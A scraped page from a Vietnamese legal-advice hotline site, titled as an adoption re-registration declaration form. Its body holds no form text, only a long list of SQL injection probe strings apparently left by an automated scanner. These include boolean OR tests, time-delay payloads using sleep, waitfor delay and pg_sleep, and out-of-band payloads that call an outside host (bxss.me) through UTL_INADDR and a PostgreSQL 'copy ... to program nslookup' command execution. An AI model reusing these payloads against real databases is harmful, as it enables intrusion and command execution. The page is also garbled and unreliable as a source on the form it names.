Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí lại việc nuôi con nuôi

Cập nhật lần cuối lúc 11:10 ngày 16/07/2013

Nguồn: vinalaf.com.vn
1
1
1
1
-1 OR 2+787-787-1=0+0+0+1 --
-1 OR 3+787-787-1=0+0+0+1 --
1'"
-1 OR 3*2<(0+5+787-787) --
-1 OR 3*2>(0+5+787-787) --
\
-1 OR 2+50-50-1=0+0+0+1
1
-1 OR 3+50-50-1=0+0+0+1
@@A0Oqz
JyI=
-1 OR 3*2<(0+5+50-50)
-1 OR 3*2>(0+5+50-50)
-1' OR 2+623-623-1=0+0+0+1 --
-1' OR 3+623-623-1=0+0+0+1 --
-1' OR 3*2<(0+5+623-623) --
-1' OR 3*2>(0+5+623-623) --
-1' OR 2+73-73-1=0+0+0+1 or '0vGDxwuq'='
-1' OR 3+73-73-1=0+0+0+1 or '0vGDxwuq'='
-1' OR 3*2<(0+5+73-73) or '0vGDxwuq'='
-1' OR 3*2>(0+5+73-73) or '0vGDxwuq'='
-1" OR 2+35-35-1=0+0+0+1 --
-1" OR 3+35-35-1=0+0+0+1 --
-1" OR 3*2<(0+5+35-35) --
-1" OR 3*2>(0+5+35-35) --
if(now()=sysdate(),sleep(10.827),0)/*'XOR(if(now()=sysdate(),sleep(10.827),0))OR'"XOR(if(now()=sysdate(),sleep(10.827),0))OR"*/
(select(0)from(select(sleep(10.827)))v)/*'+(select(0)from(select(sleep(10.827)))v)+'"+(select(0)from(select(sleep(10.827)))v)+"*/
-1; waitfor delay '0:0:7.218' --
-1); waitfor delay '0:0:10.827' --
1 waitfor delay '0:0:10.827' --
0ehpBh13'; waitfor delay '0:0:10.827' --
-1;select pg_sleep(3.609); --
-1;select pg_sleep(7.218); --
-1);select pg_sleep(7.218); --
-1));select pg_sleep(10.827); --
idHUL5lG';select pg_sleep(10.827); --
duFWPisb';select pg_sleep(3.609); --
B90GJlD3';select pg_sleep(7.218); --
xliN68Mu');select pg_sleep(7.218); --
nwtDZ40v'));select pg_sleep(7.218); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6088.34060.a2b24.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6090.34060.a2b24.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6092.34060.a2b24.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6094.34060.a2b24.\1.bxss.me
439'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: